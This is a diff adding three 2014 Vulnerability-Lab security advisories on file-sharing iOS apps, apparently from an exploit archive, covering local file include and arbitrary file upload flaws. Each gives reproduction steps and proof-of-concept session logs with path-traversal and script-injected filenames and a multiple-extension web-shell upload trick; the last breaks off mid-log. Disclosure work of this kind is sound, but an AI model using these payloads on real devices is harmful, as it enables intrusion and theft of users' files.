+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+				Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
+
+
+-- 
+VULNERABILITY LABORATORY RESEARCH TEAM
+DOMAIN: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+
diff --git a/platforms/ios/webapps/33630.txt b/platforms/ios/webapps/33630.txt
new file mode 100755
index 000000000..aee98c718
--- /dev/null
+++ b/platforms/ios/webapps/33630.txt
@@ -0,0 +1,220 @@
+Document Title:
+===============
+TigerCom My Assistant v1.1 iOS - File Include Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1268
+
+
+Release Date:
+=============
+2014-05-23
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1268
+
+
+Common Vulnerability Scoring System:
+====================================
+6.9
+
+
+Product & Service Introduction:
+===============================
+Folder manager, Convenient transmission, Document browsing, Compression & Decompression, Password-protected.
+
+- Support multi-level directory management
+- Add new folder
+- Open camera, store photos and recording video
+- Photos and video high fidelity storage
+- Import photos and videos from album
+- Export photos and videos to your album
+- Copy, paste, delete, Email attachments
+- Support multiple files operation
+- Support sorting by name and type
+- Icon shows file type
+
+Convenient transmission:
+- Wifi Transmission, you can share files between iphone, ipad and computer
+- Current open folder sharing, better protect your privacy
+- USB transfer and share files via Itunes
+
+Document browsing:
+- Txt document browsing and editing (txt)
+- PDF document browsing (pdf)
+- Word browsing (doc, docx)
+- Excel browsing (xls, xlsx)
+- PowerPoint browsing (ppt, pptx)
+- Picture browsing (png, jpg, jpeg, jpe)
+- Video player (mov, mp4, m4v, mpv, 3pg)
+- Audio player (mp3, wav, aif)
+
+Safty:
+- Intelligent encryption, protect the folder
+- Password-protected switch
+
+( Copy of the Homepage: https://itunes.apple.com/en/app/my-assistant-free/id626680229 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered a local file include web vulnerability in the official TigerCom My Assistant v1.1 iOS mobile web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2014-05-23: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+TigerCom
+Product: My Assistant Free 1.1
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+A local file include web vulnerability has been discovered in the official TigerCom My Assistant v1.1 iOS mobile web-application.
+The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific 
+path commands to compromise the mobile web-application.
+
+The web vulnerability is located in the `filename` value of the `UPLOAD_FILE_TO_FOLDER` (uploadfile) module. Remote attackers are able 
+to inject own files with malicious `filename` values in the `upload` POST method request to compromise the mobile web-application. The local 
+file/path include execution occcurs in the index file/folder list context in the vulnerable name/path value. The attacker is able to inject 
+the local file include request by usage of the available `wifi interface`.
+
+Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute 
+different local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to 
+inject is POST. 
+
+The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) 
+count of 7.0. Exploitation of the local file include web vulnerability requires no privileged web-application user account but low 
+user interaction. Successful exploitation of the local file include web vulnerability results in mobile application or connected 
+device component compromise.
+
+
+Request Method(s):
+				[+] [POST]
+
+Vulnerable Service(s):
+				[+] WiFi Sharing 
+
+Vulnerable Module(s):
+				[+] UPLOAD_FILE_TO_FOLDER
+
+Vulnerable File(s):
+				[+] uploadfile
+
+Vulnerable Parameter(s):
+				[+] filename
+
+Affected Module(s):
+				[+] Index File/Folder Dir Listing (http://localhost:8080/)
+
+
+Proof of Concept (PoC):
+=======================
+The local file/path include web vulnerability can be exploited by local network attackers with low user interaction. For security demonstration or 
+to reproduce the vulnerability follow the provided information and steps below to continue.
+
+PoC: UPLOAD FILE TO FOLDER
+<tbody><tr style="background:#fff;"><td colspan="2" align="left">Current Folder: Document</td></tr><tr style="background:#fff;">
+<td colspan="2" align="right"><a href="/UPLOAD_FILE_TO_FOLDER">Uploading files</a>  </td></tr><tr><td colspan="2">
+<a href="68-2.png" target="_blank"> 68-2.png </a></td></tr><tr><td colspan="2">
+<a href="%20./../[LOCAL FILE/PATH INCLUDE WEB VULNERABILITY!].filetype" target="_blank"> %20./../[LOCAL FILE/PATH INCLUDE WEB VULNERABILITY!].filetype </a></td></tr>
+<tr><td colspan="2"><a href="night-city-pictures-24.jpg" target="_blank"> night-city-pictures-24.jpg </a></td></tr>
+</table></div></body>
+</html></iframe></a></td></tr></tbody>
+
+
+
+--- PoC Session Logs [POST] ---
+Status: 200[OK]
+ POST http://localhost:8080/uploadfile Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Gr??e des Inhalts[-1] Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://localhost:8080/UPLOAD_FILE_TO_FOLDER]
+      Connection[keep-alive]
+   POST-Daten:
+      POST_DATA[-----------------------------189051727528435
+Content-Disposition: form-data; name="upload1"; filename="<%20./../[LOCAL FILE/PATH INCLUDE WEB VULNERABILITY!].filetype"
+Content-Type: image/x
+
+
+Reference(s):
+http://localhost:8080/uploadfile
+http://localhost:8080/UPLOAD_FILE_TO_FOLDER
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a secure restriction and parse of the vulnerable filename value in the multi upload module.
+Restrict the input name value and encode the name output value in the index listing module to prevent further local file include attacks.
+Do not forget to disallow multiple file extensions which could result in the bypass or the filetype validation.
+
+
+Security Risk:
+==============
+The security risk of the local file include web vulnerability in the upload to file index module is estimated as high.
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either 
+expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers 
+are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even 
+if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation 
+of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break 
+any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
+Section:    dev.vulnerability-db.com	 	- forum.vulnerability-db.com 		       		- magazine.vulnerability-db.com
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+				Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
+
+
+
+-- 
+VULNERABILITY LABORATORY RESEARCH TEAM
+DOMAIN: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+
diff --git a/platforms/ios/webapps/33631.txt b/platforms/ios/webapps/33631.txt
new file mode 100755
index 000000000..e7fa689f5
--- /dev/null
+++ b/platforms/ios/webapps/33631.txt
@@ -0,0 +1,213 @@
+Document Title:
+===============
+AllReader v1.0 iOS - Multiple Web Vulnerabilities
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1269
+
+
+Release Date:
+=============
+2014-05-26
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1269
+
+
+Common Vulnerability Scoring System:
+====================================
+6.8
+
+
+Product & Service Introduction:
+===============================
+Professional helper on your iPhone, iPad, and iPod that will allow you to read virtually any file type right from your device: PDF, DJVU, DOC, XLS, PPT, TXT,
+Image, Video files, whether these are important documents, books, student materials, notes or you can just view pictures and video clips. 
+Supported devices: iPhone 3Gs/4/4S/5, iPod Touch 4/5, all iPad generations.
+
+(Copy of the Homepage: https://itunes.apple.com/us/app/all-reader./id871830567 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered a local file include web vulnerability in the official AllReader v1.0 iOS mobile application by Wylsacom Waytt.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2014-05-26: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Wylsacom Waytt
+Product: AllReader - iOS Mobile Application 1.0
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+A local file include web vulnerability has been discovered in the official AllReader v1.0 iOS mobile application by Wylsacom Waytt.
+The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific 
+path commands to compromise the mobile web-application.
+
+The web vulnerability is located in the `filename` value of the `file upload` module. Remote attackers are able to inject own files with 
+malicious `filename` values in the `file upload` POST method request to compromise the mobile web-application. The local file/path 
+execution occcurs in the index file/path dir list context. The attacker is able to inject the malicious file/path include request by usage 
+of the available `wifi interface`.
+
+Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute 
+different local malicious attacks requests. The attack vector is on the application-side of the allreader wifi service and the request 
+method to inject is POST. 
+
+The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count 
+of 6.8. Exploitation of the local file include web vulnerability requires no privileged web-application user account withoutuser interaction. 
+Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise.
+
+
+Request Method(s):
+				[+] [POST]
+
+Vulnerable Service(s):
+				[+] WiFi Transfer UI
+
+Vulnerable Module(s):
+				[+] Upload File
+
+Vulnerable Parameter(s):
+				[+] filename
+
+Affected Module(s):
+				[+] Index File/Folder Dir Listing (http://localhost:8080/)
+
+
+Proof of Concept (PoC):
+=======================
+The local file/path include web vulnerability in the web-server can be exploited by local attackers without auth or user interaction.
+For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
+
+Manual steps to reproduce the security vulnerability ...
+1. Install the ios application (iphone or ipad)
+2. Start it and move to the settings menu, activate the wifi server
+3. Go to another computer in the same network and surf to the local web-server url (localhost:8080)
+4. Upload a random image 
+5. Tamper the session information by an intercept, exchange the vulnerable `filename` value with own malicious file or path request
+Note: Payloads can be combined with script code to successful execute different other attacks like hijacking, phishing and co.
+5. Submit the settings and refresh the file dir index list
+6. The code execution occurs in the file dir index list of ios app
+7. Successful reproduce of the local fil/path include web vulnerability 
+
+PoC: File Dir Index List - http://localhost:8080/
+<html><head><title>Files from </title><meta http-equiv="Content-Type" content="text/html; 
+charset=UTF-8"><style>html {background-color:#eeeeee} body { background-color:#FFFFFF; font-family:Tahoma,Arial,Helvetica,sans-serif; 
+font-size:18x; margin-left:15%; margin-right:15%; border:3px groove #006600; padding:15px; } </style></head><body><h1>Files from </h1>
+<bq>The following files are hosted live from the iPhone's Docs folder.</bq><p><a href="..">..</a><br>
+<a href="../.[LOCAL FILE/PATH INCLUDE WEB VULNERABILITY].png"><../.[LOCAL FILE/PATH INCLUDE WEB VULNERABILITY!].png</a>	(0.5 Kb, 2014-05-26 11:49:04 +0000)<br />
+</p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"><label>upload file<input type="file" name="file" id="file" /></label>
+<label><input type="submit" name="button" id="button" value="Submit" /></label></form></body></html></iframe></a></p></body></html>
+
+
+--- POC SESSION LOGS [POST] ---
+Status: 200[OK]
+POST http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Gr??e des Inhalts[821] Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://localhost:8080/]
+      Connection[keep-alive]
+   POST-Daten:
+      POST_DATA[-----------------------------102203247921326
+Content-Disposition: form-data; name="file"; filename="../.[LOCAL FILE/PATH INCLUDE WEB VULNERABILITY!].png"
+Content-Type: image/png
+
+-- RESPONSE HEADER
+Status: 200[OK]
+GET http://localhost:8080/../.[LOCAL FILE/PATH INCLUDE WEB VULNERABILITY!] Load Flags[LOAD_DOCUMENT_URI  ] Gr??e des Inhalts[721] Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://localhost:8080/]
+      Connection[keep-alive]
+   Response Header:
+      Accept-Ranges[bytes]
+      Content-Length[721]
+      Date[Mo., 26 Mai 2014 11:49:06 GMT]
+
+
+
+Reference(s):
+http://localhost:8080/
+http://localhost:8080/../x
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a secure parse and encode of the vulnerale filename value in the upload module POST method request.
+The file dir index list needs to encode malicious filenames even of the input is already parsed to prevent further attacks via file/path value.
+Restrict, filter or use a secure exception-handling to disallow special chars, html tags or script codes.
+
+
+Security Risk:
+==============
+The security risk of the local file/path include web vulnerability is estimated as high(-).
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either 
+expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers 
+are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even 
+if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation 
+of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break 
+any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
+Section:    dev.vulnerability-db.com	 	- forum.vulnerability-db.com 		       		- magazine.vulnerability-db.com
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+				Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
+
+-- 
+VULNERABILITY LABORATORY RESEARCH TEAM
+DOMAIN: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+
diff --git a/platforms/ios/webapps/33632.txt b/platforms/ios/webapps/33632.txt
new file mode 100755
index 000000000..c23b15ca7
--- /dev/null
+++ b/platforms/ios/webapps/33632.txt
@@ -0,0 +1,400 @@
+Document Title:
+===============
+Bluetooth Photo-File Share v2.1 iOS - Multiple Web Vulnerabilities
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1270
+
+
+Release Date:
+=============
+2014-05-30
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1270
+
+
+Common Vulnerability Scoring System:
+====================================
+7
+
+
+Product & Service Introduction:
+===============================
+This is the best bluetooth sharing and file transfer app in app store. Transfer photo, video, contacts and any file between two 
+iPhone, iPad and/or iPod Touches over bluetooth connection. Requires iPhone 3G or later or 2nd generation iPod Touch or later. 
+Does not require any 3G or WiFi connection. Unlike some other bluetooth photo sharing apps only can transfer photo from Photo 
+Library, The bluetooth share not only can transfer photo, but also it can transfer video from Photo Library.
+
+( Copy of the Homepage: https://itunes.apple.com/de/app/bluetooth-photo-video-musik/id590369016 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official Bluetooth Photo/Video /Musik /Contact /File Share v2.1 iOS mobile application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2014-05-30: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Tao Xu
+Product: Bluetooth Photo /Video /Musik /Contact /File Share - iOS Mobile Web Application 2.1
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+1.1
+A local file include web vulnerability has been discovered in the official Bluetooth Photo/Video /Musik /Contact /File Share v2.1 iOS mobile application.
+The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to 
+compromise the mobile web-application.
+
+The web vulnerability is located in the `filename` value of the `data upload` module. Remote attackers are able to inject own files with malicious `filename` 
+values in the `file upload` POST method request to compromise the mobile web-application. The local file/path execution occcurs in the file/path dir index
+list web context. The attacker is able to inject the malicious file/path include request by usage of the available `filesharing > wifi-transfer interface`.
+
+Local attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute different local malicious 
+attacks requests. The attack vector is on the application-side of the allreader wifi service and the request method to inject is POST. The security risk of the 
+local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.8. 
+
+Exploitation of the local file include web vulnerability requires no privileged web-application user account withoutuser interaction. 
+Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise.
+
+Request Method(s):
+				[+] [POST]
+
+Vulnerable Module(s):
+				[+] Filesharing > Wi-fi Transfer UI
+
+Vulnerable Function(s):
+				[+] Upload
+
+Vulnerable Parameter(s):
+				[+] filename
+
+Affected Module(s):
+				[+] Index File Dir List (http://localhost:8080/)
+
+
+
+
+1.2
+An arbitrary file upload web vulnerability has been discovered in the official Bluetooth Photo/Video /Musik /Contact /File Share v2.1 iOS mobile application.
+The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the system validation and compromise the web-server.
+
+The vulnerability is located in the upload file module. Remote attackers are able to upload a php or js web-shells by a rename of the file with multiple extensions 
+to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name and extension `pentest.png.js.html.php`. After the 
+upload the attacker needs to open the file in the web application. He deletes the .png file extension and can access the application with elevated access rights. 
+The security risk of the arbitrary file upload web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.1.
+
+Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password.
+Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.
+
+
+Request Method(s):
+				[+] [POST]
+
+Vulnerable Module(s):
+				[+] Filesharing > Wi-fi Transfer UI
+
+Vulnerable Function(s):
+				[+] Upload
+
+Vulnerable Parameter(s):
+				[+] filename (multiple extensions)
+
+Affected Module(s):
+				[+] Index File Dir Listing (http://localhost:8080)
+
+
+Proof of Concept (PoC):
+=======================
+1.1
+The local file include web vulnerability can be exploited by local attackers without privileged application user account or user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+Manual steps to reproduce the vulnerability ...
+
+1. Install the mobile application to your apple ios device (iphone/ipad)
+2. Open the application locally and activate the wifi transfer & export function
+3. Login to another remote device in the same network to the application interface (localhost:8080)
+4. Choose a random file to upload, start a session tamper to intercept and press the submit button
+5. Change in the POST method request of the upload module the vulnerable filename value
+Note: Include for example a local device component file or mobile application path as value
+6. Continue the request, refresh the index page and download the local file or request unauthorized the mobile device path
+7. Successful reproduce of the local file include web vulnerability!
+
+
+PoC: Wi-fi Transfer (UI) - Index File Dir Listing
+
+<div class="filetable">
+<table border="0" cellpadding="0" cellspacing="0"></table>
+<table id="filetable" cellpadding="0" cellspacing="0" width="860px"><thead><tr>
+<th class="file">File Name</th><th style="padding-left:15px">File Size</th><th class="actionbutton"></th><th class="actionbutton"></th></tr>
+</thead><tbody id="filelist" style="padding-left:15px;">
+<tr><td class="file"><a href="/files/./[LOCAL FILE/PATH INCLUDE VULNERABILITY VIA FILENAME VALUE].png" class="file">
+<./[LOCAL FILE/PATH INCLUDE VULNERABILITY VIA FILENAME VALUE]">.png</a></td><td class='info'>538.00B</td>
+<td class='actionbutton' ><form><input type='button' value='Download' 
+onClick="window.location.href='/files/./[LOCAL FILE/PATH INCLUDE VULNERABILITY VIA FILENAME VALUE].png'"></form></td>
+<td class='actionbutton' ><form action='/files/%3Ciframe%20src=a%3E.png' method='post' ><input name='_method' value='delete' type='hidden'/>
+<input name="commit" type="submit" value="Delete" class='button' /></form></td></tr></tbody></table></iframe></a></td></tr></tbody></table>
+<br><br></div>
+
+
+--- POC SESSION LOGS [POST] (LFI) ---
+19:32:08.304[128ms][total 128ms] Status: 302[Found]
+POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Gr??e des Inhalts[67] Mime Type[text/html]
+   Request Header:
+      Host[localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://localhost:8080/]
+      Connection[keep-alive]
+   POST-Daten:
+      POST_DATA[-----------------------------284152263011599
+Content-Disposition: form-data; name="newfile"; filename="<iframe src=a>.png"
+Content-Type: image/png
+-
+
+19:32:09.312[129ms][total 177ms] Status: 200[OK]
+GET http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI  LOAD_REPLACE  LOAD_INITIAL_DOCUMENT_URI  ] Gr??e des Inhalts[61465] Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://localhost:8080/]
+      Connection[keep-alive]
+   Response Header:
+      Accept-Ranges[bytes]
+      Content-Length[61465]
+      Date[Mi., 28 Mai 2014 17:45:38 GMT]
+
+
+-
+
+19:32:10.023[143ms][total 143ms] Status: 200[OK]
+GET http://localhost:8080/files?Wed%20May%2028%202014%2019:32:09%20GMT+0200 Load Flags[LOAD_BACKGROUND  ] Gr??e des Inhalts[60] Mime Type[text/plain]
+   Request Header:
+      Host[localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
+      Accept[application/json, text/javascript, */*]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      X-Requested-With[XMLHttpRequest]
+      Referer[http://localhost:8080/]
+      Connection[keep-alive]
+   Response Header:
+      Accept-Ranges[bytes]
+      Content-Length[60]
+      Cache-Control[private, max-age=0, must-revalidate]
+      Content-Type[text/plain; charset=utf-8]
+      Date[Mi., 28 Mai 2014 17:45:39 GMT]
+
+
+-
+
+19:32:10.623[147ms][total 147ms] Status: 200[OK]
+ GET http://localhost:8080/.././[LOCAL FILE/PATH INCLUDE VULNERABILITY VIA FILENAME VALUE]; Load Flags[LOAD_DOCUMENT_URI  ] Gr??e des Inhalts[0] Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://localhost:8080/]
+      Connection[keep-alive]
+   Response Header:
+      Accept-Ranges[bytes]
+      Content-Length[0]
+      Date[Mi., 28 Mai 2014 17:45:39 GMT]
+
+
+
+Reference(s):
+http://localhost:8080/
+
+
+
+1.2
+The arbitrary file upload web vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+PoC:
+19:32:11.222[142ms][total 142ms] Status: 200[OK] 
+GET http://localhost:8080/files/pentest.png.js.html.php
+
+
+Manual steps to reproduce the vulnerability ...
+1. Install the mobile application to your apple ios device (iphone/ipad)
+2. Open the application locally and activate the wifi transfer & export function
+3. Login to another remote device in the same network to the application interface (localhost:8080)
+4. Choose a random file to upload, start a session tamper to intercept and press the submit button
+5. Change in the POST method request of the upload the vulnerable filename value
+Note: Include a webshell with multiple file extensions (exp. pentest.png.js.html.php.aspx.js.png) to bypass the mobile application filter
+6. Upload the file and request after the refresh the following url http://localhost:8080/files/pentest.png.js.html.php.aspx.js.png
+Note: To execute the arbitrary code it is required to delete the .png file extensions
+7. Successful reproduce of the arbitrary file upload web vulnerability!
+
+
+--- POC SESSION LOGS [POST] (AFU) ---
+19:32:08.304[128ms][total 128ms] Status: 302[Found]
+POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Gr??e des Inhalts[67] Mime Type[text/html]
+   Request Header:
+      Host[localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://localhost:8080/]
+      Connection[keep-alive]
+   POST-Daten:
+      POST_DATA[-----------------------------284152263011599
+Content-Disposition: form-data; name="newfile"; filename="pentest.png.js.html.php.aspx.js.png"
+Content-Type: image/png
+-
+
+19:32:09.312[129ms][total 177ms] Status: 200[OK]
+GET http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI  LOAD_REPLACE  LOAD_INITIAL_DOCUMENT_URI  ] Gr??e des Inhalts[61465] Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://localhost:8080/]
+      Connection[keep-alive]
+   Response Header:
+      Accept-Ranges[bytes]
+      Content-Length[61465]
+      Date[Mi., 28 Mai 2014 17:45:38 GMT]
+
+
+-
+
+19:32:10.023[143ms][total 143ms] Status: 200[OK]
+GET http://localhost:8080/files?Wed%20May%2028%202014%2019:32:09%20GMT+0200 Load Flags[LOAD_BACKGROUND  ] Gr??e des Inhalts[60] Mime Type[text/plain]
+   Request Header:
+      Host[localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
+      Accept[application/json, text/javascript, */*]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      X-Requested-With[XMLHttpRequest]
+      Referer[http://localhost:8080/]
+      Connection[keep-alive]
+   Response Header:
+      Accept-Ranges[bytes]
+      Content-Length[60]
+      Cache-Control[private, max-age=0, must-revalidate]
+      Content-Type[text/plain; charset=utf-8]
